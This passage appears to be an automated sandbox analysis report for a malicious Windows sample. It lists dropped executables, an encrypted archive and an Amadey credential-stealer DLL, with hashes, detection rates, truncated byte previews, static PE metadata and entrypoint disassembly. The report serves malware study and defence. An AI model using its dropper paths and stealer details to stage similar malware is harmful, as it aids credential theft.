Size (bytes):	129024
Entropy (8bit):	6.5122035629449355
Encrypted:	false
SSDEEP:	3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
MD5:	507E9DC7B9C42F535B6DF96D79179835
SHA1:	ACF41FB549750023115F060071AA5CA8C33F249E
SHA-256:	3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
SHA-512:	70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Metadefender, Detection: 71%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......\|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2B4A.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	300544
Entropy (8bit):	7.542146445882773
Encrypted:	false
SSDEEP:	3072:fNXZIOquqTc5+9AgXR2numfufipMbiH7Evn7TGq5gXiXRsBmS7F4GYcNLlR3LTcU:fn+uW9AskuYufipGiudsqcNxRsi9
MD5:	2DEE200193091BE2F2321D921750C4ED
SHA1:	4C5B6C7512BE4D4E200C4141DC0E90BCABCE4CA3
SHA-256:	7330807028605EBA5B4ECFACA0390B78CB04E4276D1DE23EB95B407E1244EF12
SHA-512:	4124E9BC1C7C587CE394AD35EC56FD3C6EC4466167DF6E00FFA1D88B09B34FA69072D946337CAD696223D31D85F8662FF9D5452C474D20CCA06D91A8B9C608AD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: NaN%, Browse Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m4.r.g.r.g.r.g. .g.r.g. .g.r.g.xg.r.g.r.gDr.g. .g.r.g. .g.r.g. .g.r.gRich.r.g........................PE..L...^.ab.................8...........c.......P....@..................................3.......................................:..P........<..........................`................................4..@............................................text....6.......8.................. ..`.data....K...P.......<..............@....rsrc....<.......<...Z..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3790.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	382464
Entropy (8bit):	6.969580968654444
Encrypted:	false
SSDEEP:	6144:O3eRNpLX3EJscap6Hi+RtWce2vjacYJdjpPnFwCLLObfwB:9NtUJsP0jVerxqC3O
MD5:	5E08968D858224A33175069D64DC7F39
SHA1:	8D18D2E867205BA9D0F42DB569C335609FDC1752
SHA-256:	9329CAC20692208A720E6565B51F2492FFAE539FF9B2AD469D6FAC8FDA061C87
SHA-512:	06D08EC2C2352AA7DFCD97F6E3691EFC1AF91CB1409543566D5D4E230D2665DB6F5C820F28D88519D6D888852FAD3B4725E32D36F9ACA3577554D6DCFED1613C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a................."....D......H.......@....@...........................F..............................................'..(....pC.xC....................E......................................,..@............................................text...f .......".................. ..`.data....)B..@...(...&..............@....rsrc...xC...pC..D...N..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\453D.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1235912
Entropy (8bit):	7.847488370221355
Encrypted:	false
SSDEEP:	24576:tpoG1/LlgEyH9QhH0slclslX6ptmEh4NqYJUo02O7RVUCshnSVjGMY0tZ8bMyqZs:tpocLlac0s5Ih4Ny/Ybb
MD5:	F96144B1D5B53D93CAADDDADE38DB5E9
SHA1:	1587E66F9A4D83060EE597F983A7323A556BC1C0
SHA-256:	63018F38311387AA7F511F090FD154EA6EC3799C2F4762890082793912C68146
SHA-512:	824A86438150DF143C7475605600B4A03DBFA819806F193BE248650A3A70E97BDCD3D20CAC9B8B00693D464B5CBD168E1F0C78BEAA00D167B8A877CFBCE3C34C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..{..M{..M{..M..fMg..M..SMi..M..gM...Mr.^Mr..M{..M&..M..bMy..M..WMz..M{.ZM}..M..PMz..MRich{..M................PE..L...O.wc.................X..........mk.......p....@.......................... ..................................................d........3...........................................................................p..\............................text....V.......X.................. ..`.rdata...%...p...&...\..............@..@.data...,5..........................@....rsrc....3.......4..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\59FE.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3188224
Entropy (8bit):	7.964888519163398
Encrypted:	false
SSDEEP:	98304:9R5aeXkEIsmuDvFmvNtLmVLF5HLiBrvpPFI:9Dv5lJz4v3LMLiBrh2
MD5:	44A7E13ECC55CE9797C5121B230D9927
SHA1:	B99F1D86E6D9C7E0D694CA605ABD205663278487
SHA-256:	9E0425E14520485FA7E86057D07D26E8064F99A7AD09E35211EDD4A428EE57AE
SHA-512:	74DF06B20D23483F854B5A88E5CCDFE534497630A105614E6CD87F3238398E0FB03218CB864FD6F7798B69E083C1098225010AECD959FBEC28D63C0626711A9F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}!...O...O...O..wL...O..wK...O..wJ.e.O..wN...O...N..O.fK...O.fL...O.fJ..O.fJ...O.fM...O.Rich..O.................PE..d....0xc..........".... .6..........4..........@..............................1...........`..................................................^..(.............0.$$............0.(...P)...............................(..@............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data....6-..p... -..T..............@....pdata..$$....0..&...t0.............@..@_RDATA..\.....0.......0.............@..@.reloc..(.....0.......0.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6644.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.812640405950158
Encrypted:	false
SSDEEP:	6144:CV8MTz4fnz5/zNOCVmcUh+3oQ9gOU+fzYBb6:bMYfz5smmM9gT6
MD5:	19A79DADDFAAC09499E79ADE27E756F8
SHA1:	6BFD114AF2D1A68C4724961C6E761373EFE66C52
SHA-256:	3F2EA3CA90B2DF0D2A93DF0E4328F58077A5BDBB97B2DFFE81B589C057F93216
SHA-512:	AEA9D6CF93EB6ADA5D895C70DA8CBF4CA56BEB1125FC33961E112DCBAEA122F82DD4CBC9FE241DDCC5F5EBC6A71F83B03BEAF645F3A6E2724ACB03E7D61007A3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.,.?iB.?iB.?iB.!;..iB.!;.,iB.!;..AiB...9.<iB.?iC.FiB.!;.>iB.!;.>iB.!;.>iB.Rich?iB.........PE..L....^Na................. ....D......H.......0....@..........................pE......!......................................t%..(.....B..A................... E..................................... -..@............................................text...V........ .................. ..`.data.....A..0.......$..............@....rsrc....A....B..B..................@..@.reloc...A... E..B..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6CEC.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	7.386873779597766
Encrypted:	false
SSDEEP:	6144:b2GSJmjsOF3L5n8qcXE63miXHB0rtlC0VAin2iuu5hxIpSjgOi6ziFB:CGSUogb5n8q68t/VMu5XQSMGu
MD5:	28A6112DCB54CE6886F7D9ACB8A15E31
SHA1:	432B6AF51096CD77D667F79B2CF89F5DD37FA748
SHA-256:	B35656FEA1C887375414AFA04BDF2DD240541F215D01B4E6B0DACC4BA8ECC73C
SHA-512:	BA86E0832339E33F13BD4F148C7616DE36BBC4A142AB42C7193212A069E5F179E6191368D5AEBFDA74C6AE6DA2606A1E36C2DDF531F38F85EAE589C3462302E0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}...................................Q......................................Rich....................PE..L....xc.................B...H......P........`....@.................................(..........................................(.......(............................................................................`..@............................text....A.......B.................. ..`.rdata...H...`...J...F..............@..@.data...8...........................@....rsrc...(............x..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\816F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	228864
Entropy (8bit):	4.207192388303838
Encrypted:	false
SSDEEP:	1536:w6qNKWPdNWepOzb3OdC9E4/hUYcgvqytNIxYcW9yz:uVvWepYb+dmugvntaxw9
MD5:	730A7A6F235525238EE33A2C046C2BA7
SHA1:	DAA1B8E97D23B32B99B4B230DE9608FF1BCD5BF7
SHA-256:	4F24670DB3AA4D4DB6CED0A59AAEA20D9B784C69E181468905DB4D559FB6AFE1
SHA-512:	D97C53CEA4E2FB99BC3DD44E139D3F331251A68F085C980EBA5E8D76D5124195E2FF8958A297CFC9D0500EC90908A45CF6E76603A0040D504B8BF524AE7A9F0E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vc................................. ........@.. ...............................h....@.....................................S.......H............................................................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc...............\|..............@..B........................H............$......)....................................................0..Y.......(........% ....TF........ ....Z........ ....Z.... ............. ............. ............. .........%...................................... ....;................F........ ....X........ ....?........ ....=.... ........?d... ........=....8{... ........?.... ........=....8....8.... ........?.... ........=....8....8\|...8w... ........?>... ........=....8.... ........?.... ........=....80...80...8+

C:\Users\user\AppData\Local\Temp\853321935212

Download File

Process:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	82823
Entropy (8bit):	7.894936066768262
Encrypted:	false
SSDEEP:	1536:CJIA2DzHu++Bp1Xfcj6pnUh0kn9MsMRGnauvp48ePCH5ViZEylibB:r3H1CvPcjCUh1nPauvXegcuek
MD5:	BC42901C6E0D67944F7136A6CF75D87F
SHA1:	79B7FE4111C298B32D52C6A635F176E93FC2562C
SHA-256:	1BA5179353D7E9C3831D1DEEDED3FC01332E5A0BFE21267C5DC941A27E619193
SHA-512:	F4C4897CB90653854649065A15D307A5DB7DF838C04DD7940501CC9D21451AC70269E79C99A72A8853BCD8FA430D90D9826B6332AD35517DA320DD07D674E679
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W....Q..G.Z5..$....i_.S...'..9'.j...............;...d..;..F......r..!vV.s......xg.?.w.....q.....X.v?...Gp*.T...6..&.ZJ.i(....R..!....a._.....4."4h.d.J..=.e%.v8.'dy.-}E...G....u...MI...G.?..w...MY.h..\|.E{..>...

C:\Users\user\AppData\Local\Temp\86EE.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341006
Entropy (8bit):	7.632238569480827
Encrypted:	false
SSDEEP:	6144:mYCc3GK5cRKFKT0Am1GaDgj9cBtrttZbzT1+Iq0UMNpBfO/6kjDt/JwrkgdxEy:mA3GKiRzTLQWKBtrzdpx/u6kBJwvjz
MD5:	F46063253FF38E6B2452BF4410C5FEC0
SHA1:	C2444E21CC72BFC1CD74197E327323EB2E3E3815
SHA-256:	D0A4986CEA15C050DEE854CCD21CFF84179A950A70FAEC28526C7AEBD25A0970
SHA-512:	BFA09A46DACD3138448A93782229B24993F47F6EF6C7B283B55A32E056BB76DC63F043FC4BB64D57F49FB6D5B3A97551B55EC0363B2F7DF3193E5144F85A3A50
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=Y.S..S..S......S...W..S...P..S...V...S...R..S...R..S..R...S._.V..S._....S._.Q..S.Rich.S.........................PE..L....uxc...............".j...<......+m............@.................................A.....@.............................................................................8...............................@............................................text....i.......j.................. ..`.rdata...%.......&...n..............@..@.data...P...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8C00.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	341006
Entropy (8bit):	7.632238569480827
Encrypted:	false
SSDEEP:	6144:mYCc3GK5cRKFKT0Am1GaDgj9cBtrttZbzT1+Iq0UMNpBfO/6kjDt/JwrkgdxEy:mA3GKiRzTLQWKBtrzdpx/u6kBJwvjz
MD5:	F46063253FF38E6B2452BF4410C5FEC0
SHA1:	C2444E21CC72BFC1CD74197E327323EB2E3E3815
SHA-256:	D0A4986CEA15C050DEE854CCD21CFF84179A950A70FAEC28526C7AEBD25A0970
SHA-512:	BFA09A46DACD3138448A93782229B24993F47F6EF6C7B283B55A32E056BB76DC63F043FC4BB64D57F49FB6D5B3A97551B55EC0363B2F7DF3193E5144F85A3A50
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=Y.S..S..S......S...W..S...P..S...V...S...R..S...R..S..R...S._.V..S._....S._.Q..S.Rich.S.........................PE..L....uxc...............".j...<......+m............@.................................A.....@.............................................................................8...............................@............................................text....i.......j.................. ..`.rdata...%.......&...n..............@..@.data...P...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3790.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	382464
Entropy (8bit):	6.969580968654444
Encrypted:	false
SSDEEP:	6144:O3eRNpLX3EJscap6Hi+RtWce2vjacYJdjpPnFwCLLObfwB:9NtUJsP0jVerxqC3O
MD5:	5E08968D858224A33175069D64DC7F39
SHA1:	8D18D2E867205BA9D0F42DB569C335609FDC1752
SHA-256:	9329CAC20692208A720E6565B51F2492FFAE539FF9B2AD469D6FAC8FDA061C87
SHA-512:	06D08EC2C2352AA7DFCD97F6E3691EFC1AF91CB1409543566D5D4E230D2665DB6F5C820F28D88519D6D888852FAD3B4725E32D36F9ACA3577554D6DCFED1613C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a................."....D......H.......@....@...........................F..............................................'..(....pC.xC....................E......................................,..@............................................text...f .......".................. ..`.data....)B..@...(...&..............@....rsrc...xC...pC..D...N..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\PingboardCache\argq.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	167936
Entropy (8bit):	6.1797557233483955
Encrypted:	false
SSDEEP:	3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
MD5:	75375C22C72F1BEB76BEA39C22A1ED68
SHA1:	E1652B058195DB3F5F754B7AB430652AE04A50B8
SHA-256:	8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
SHA-512:	1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\PingboardCache\wpiq.zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1019991
Entropy (8bit):	7.9981268397514125
Encrypted:	true
SSDEEP:	24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
MD5:	9E73FB50D37E37EE8BD19A8E3D2B82CA
SHA1:	3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
SHA-256:	68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
SHA-512:	B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
Malicious:	false
Preview:	PK.........e.K...yq1...@......7zxa.dll...x......d'.,.b.X%j....5.Q.7.....l.d.B.m%.)mi...$.6.2..b_...R}k[....FK...l"..O...FE.uC...02.9.../.?...=..<.......{...k.g.8N.?]....sr.....)W.0.{v.k.:.E....g]....~..k.......J.__.Q/.'..d......w.^}...).X.u..7..N........Y...i.....J........i.mi30..Mo.........i...D.GR~@.....}.....X......E\|.w.,...q7.J.0.U...,....<..}O`p.'...L..f..........PT.%..b`s..;..............\|I......<?}%./.06M......I_.8G^.....g.Fp.y.K.=..3&..$.O..a....V.6..8.]..._W...j:..g....9o._....R.+.2x^3!.<.......kv..S.u.f..L.m.......3....=....d.S....Q...~..........A..`...._f?.We.U6.H..D6...dk...4.Z....Q-...............a...^^...uTr...O:x'......uh.)..>"...f.S.l.Rb.}f.m..c.0%Yd...x.W...\....u..^....WZ..z......t+..{.....D....s.ne2....GN.qa.p..7.kD..5......v.C......~.k...f]6....P..%#.%.z.$E.!..>....#.. ......g..YH..7U.0..W.).S............^"..([.g.)d....iWc...j.w'....F.'s...M."..={.{s<........}.3..s).\|........\~.T..-k..V~....n......

C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.5122035629449355
Encrypted:	false
SSDEEP:	3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
MD5:	507E9DC7B9C42F535B6DF96D79179835
SHA1:	ACF41FB549750023115F060071AA5CA8C33F249E
SHA-256:	3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
SHA-512:	70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Metadefender, Detection: 71%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......\|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fgrijii

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	160970
Entropy (8bit):	7.998743190535304
Encrypted:	true
SSDEEP:	3072:JxAURrrQurKPLuV+kPEpzS4yYpCbAlovI5z/uZtuyRMv:JxAUgLmPZtbLmz/stK
MD5:	100024D016C74F25F89DCFE50C3B3A2F
SHA1:	23166B8D0D71B01C19B7730F2019E25A103162CA
SHA-256:	60623FFF9AAEB75C60C93F4D4E71680B868E1D05117695DA75AF0C73360A1C6F
SHA-512:	9B27BA829BE35ECA8FA57FC3170F7D0A6DB476A41900E7DD6621CB5AF5BF0787BEC2EA1F5332C8B5A9F49ECA644D92CD292733CF72303C51770D41D755B6909F
Malicious:	false
Preview:	.}C...x...h..?...lF.>.....5...s.Q.......Hf...]&.f.....#....=L4..c........B..p.......w...t..........~..xyg.m..k...Y[+...R3.O.,5.....U..s.d.._V.i.JV..s<..dVs..s.9.hV.d..;4..z....T.~.qf.1..x.....p.)..V,]..^..CTX....l\6.!.......2....d.#S..S(~...-.......h.B..[....qK...UkcT....y.D....Y..)...../F....f>)..........6%..!.]...Z....c..;R...f.wCm..W...Y......1.q;lo.#.2...f..F.>.R..7..H!.^H...<.J...K.&._...b.c.&.\|~.$-.1Kf.R.Gmu....?.'c.I..C....A..C.....}.A.~{.I..%...._v...E..:h%.)W\|.. .gFq.y.@.;~..=.Na..E..G..m..%.;=..j..o+..J...%...6..>'.UHTX......u].w.O.9..z..`..@1.>........)+..sk.....H.w.."..E....&O......a..E}.Q...O.[....GT.'+.wf.!.oy^....C.y...[..}.>.27...LA.. .~....H...b..e..4^....b....m...R0........c.......\..t..7M.{..C..I.@..Q..a6.z..S...I^k....j../8..J.}.D.. ..`s..[.P.........<.......K...f...) .......9=.....&... ..T...I[...T.K..o.{%.A.?\WL.#.....j.F....8.l.O...?.F..^..~7..L.g..)..W...[..G.b.........".^.h.........i..........+Z.x7..E.B....".c.:$

C:\Users\user\AppData\Roaming\tiddsjj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	343552
Entropy (8bit):	6.790900644113691
Encrypted:	false
SSDEEP:	6144:mzE3TFjX0rs2VfUQbgjpPnFwCLLObfwB:jFGNmxqC3O
MD5:	FFB4CF34B38F126C917E1C1E1D26DF73
SHA1:	36E558FDB10418AA971AEA3F02D6BA1F4D566ED2
SHA-256:	4A47FDBB09DD09EA813C0475D32F693CBBDED09B3753DEF43179F91E1A8F8A55
SHA-512:	E7BA484B42AF0B4FDE10736D7ABD6374145D3808961BEA2A55A2E41C9E5B3C549590E914489E0DC505C5C53C1D1B7071D42892B4458956E5CD4DECBBF1BDE765
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L...oU'a................."....D......H.......@....@..........................pE.....>d.......................................'..(.....B.xC................... E......................................,..@............................................text...f .......".................. ..`.data....A..@.......&..............@....rsrc...xC....B..D..................@..@.reloc..*B... E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tiddsjj:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.790900644113691
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	S2XJ2wbz7u.exe
File size:	343552
MD5:	ffb4cf34b38f126c917e1c1e1d26df73
SHA1:	36e558fdb10418aa971aea3f02d6ba1f4d566ed2
SHA256:	4a47fdbb09dd09ea813c0475d32f693cbbded09b3753def43179f91e1a8f8a55
SHA512:	e7ba484b42af0b4fde10736d7abd6374145d3808961bea2a55a2e41c9e5b3c549590e914489e0dc505c5c53c1d1b7071d42892b4458956e5cd4decbbf1bde765
SSDEEP:	6144:mzE3TFjX0rs2VfUQbgjpPnFwCLLObfwB:jFGNmxqC3O
TLSH:	3974CF3472B0D4B2F575C670C429CAA5AABCEC213524C9033316FBBF6E30A9D566E275
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x..1x..1x..c...1x..c..!1x..c...1x......1x..1y..1x..c...1x..c...1x..c...1x.Rich.1x.................PE..L...oU'a...........

File Icon


Icon Hash:	acfca6b6b69486e2

Static PE Info

General

Entrypoint:	0x4048a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6127556F [Thu Aug 26 08:48:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	938ae2aaaa8ec1fc2d05063ef7a2e3c5

Entrypoint Preview

Instruction
call 00007FEF60A9B8F3h
jmp 00007FEF60A96E4Dh
push 00000008h
push 00412368h
call 00007FEF60A977BAh
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 00007FEF60A96FFCh
cmp dword ptr [ecx], E06D7363h
jne 00007FEF60A96FF4h
mov eax, dword ptr [ecx+1Ch]
test eax, eax
je 00007FEF60A96FEDh
mov eax, dword ptr [eax+04h]
test eax, eax
je 00007FEF60A96FE6h
and dword ptr [ebp-04h], 00000000h
push eax
push dword ptr [ecx+18h]
call 00007FEF60A9BA7Ch
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FEF60A977C9h
ret
xor eax, eax
cmp byte ptr [ebp+0Ch], al
setne al
ret
mov esp, dword ptr [ebp-18h]
call 00007FEF60A9B9BAh
int3
call 00007FEF60A97F97h
xor ecx, ecx
cmp dword ptr [eax+00000090h], ecx
setne cl
mov al, cl
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [0042CEB0h], eax
pop ebp
ret
mov edi, edi
push ebp
